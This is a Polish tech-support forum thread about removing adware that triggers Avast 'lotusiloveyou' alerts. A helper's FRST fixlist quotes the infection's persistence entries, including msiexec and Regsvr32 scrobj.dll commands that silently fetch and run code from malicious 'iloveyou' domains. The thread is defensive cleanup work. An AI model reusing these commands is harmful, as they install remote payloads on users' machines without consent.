Skocz do zawartości

Avast powiadamia o URL:Mal lotusiloveyou


Rekomendowane odpowiedzi

Witam. Ze względu na to, że mam taki sam problem jak kolega Pibosz https://www.fixitpc.pl/topic/32446-jak-usun%C4%85%C4%87-urlmal-lotusiloveyou/ postanowiłem skopiować jego temat:

"Od kilku dni mam problem - avast ciągle wyświetla monity o malware "llotusiloveyou". Z monitu wynika, że jest on związany z procesem Regserv32. Skanowanie nic nie daje, nie usuwa niczego. Zgodnie z informacją na forum przeskanowałem komputer za pomocą FRST i GMER-a, jednak w przypadku tego drugiego nie mogłem zaznaczyć wszystkich elementów do skanowania (jedynie usługi, rejestr i pliki). Na forum avasta znalazłem taką informację z fixlistą dla FRST (https://goo.gl/swsNgs), niestety z tego co widzę każda fixlista musi być dopasowana indywidualnie. W załączniku dodaję raporty ze skanów."

Będę wdzięczny za równie skuteczną pomoc.

 

gmer.txt

Addition.txt

FRST.txt

Shortcut.txt

Odnośnik do komentarza
Pomoc jest darmowa, ale proszę rozważ przekazanie dotacji na utrzymanie serwisu: klik.

No cóż...jest infekcja faktycznie identyczna jak w tamtym temacie, ale na przyszłość: nie podoba mi się kopiowanie opisów tematów. To niszczy strukturę forum, każdy przypadek jest indywidualny i wole mieć opis również indywidualny.

 

 

1. Spróbuj uruchomić ten plik deinstalacyjny adware: C:\Users\Stacle\AppData\Roaming\webssearches\UninstallManager.exe.

 

2. Otwórz Notatnik w nim wklej:

 

CloseProcesses:
CreateRestorePoint:
HKU\S-1-5-21-531191069-2322497366-2288422930-1000\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkPGN8OTUcMWMyNDQdGdZ2ZTJfnGZ8nAh4nWZ2ZTJfnGZ8 /q
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-531191069-2322497366-2288422930-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
StartMenuInternet: IEXPLORE.EXE - iexplore.exe
S3 IntcAzAudAddService; system32\drivers\RTKVHD64.sys [X]
U3 tmlwf; Brak ImagePath
U3 tmwfp; Brak ImagePath
U3 ffrdipoc; \??\C:\Users\Stacle\AppData\Local\Temp\ffrdipoc.sys [X] 
Task: {020A73A9-C13C-452A-8BCB-B4CBEEBEFA6E} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkPGN8OTUcMWMyNDQdGdZ2ZTJfnGZ8nAh4nWZ2ZTJfnGZ8 scrobj.dll
Task: {151927A4-4E65-4502-AE5F-F7A382ADB41B} - System32\Tasks\{0C959900-9599-4038-AF97-C4598B646275} => pcalua.exe -a C:\Users\Stacle\AppData\Roaming\webssearches\UninstallManager.exe -c -ptid=w3i 
C:\Users\Stacle\AppData\Roaming\webssearches
EmptyTemp:

 

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 

Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

 

3. Pobierz AdwCleaner uruchom go i kliknij Skanuj, a gdy uaktywni się przycisk Oczyść kliknij go. Dostarcz raport z tego działania. 

 

4. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

Odnośnik do komentarza

Posłużyłem się cudzym opisem ponieważ mój przypadek był identyczny zarówno jeśli chodzi o objawy jak i o to, że GMER także nie pozwolił na zaznaczenie wszystkich opcji. Mam nadzieję, że kolega Pibosz się nie obraził.

 

Próbowałem uruchomić plik C:\Users\Stacle\AppData\Roaming\webssearches\UninstallManager.exe ale bez powodzenia. Czy może być to spowodowane tym, że jeszcze wczoraj, jakiś czas po przesłaniu raportów ze skanów, uruchomiłem Malwarebytes Anti - Malware? Usunął jakąś grupę podejrzanych struktur. Mam jeszcze raz wykonać raporty? Dodam, że kolejnych punktów nie wykonywałem. Jak widać jestem dosyć tępy w temacie więc proszę o cierpliwość. Jeszcze raz, z góry dziękuję za pomoc.

Odnośnik do komentarza

Przepraszam za kłopot ale wczoraj z kompem działo się coś dziwnego - znikąd pojawił się google chrome a firefox przestał działać. No i ogólnie wolno chodził. Zresetowałem go i przeskanowałem MBAM-em. Jeszcze raz przepraszam. Przesyłam jeszcze raz wszystkie raporty i proszę o dalsze wskazówki.

Addition.txt

FRST.txt

Shortcut.txt

gmer.txt

MBAM.txt

Odnośnik do komentarza

Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto

Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.

Zarejestruj nowe konto

Załóż nowe konto. To bardzo proste!

Zarejestruj się

Zaloguj się

Posiadasz już konto? Zaloguj się poniżej.

Zaloguj się
  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...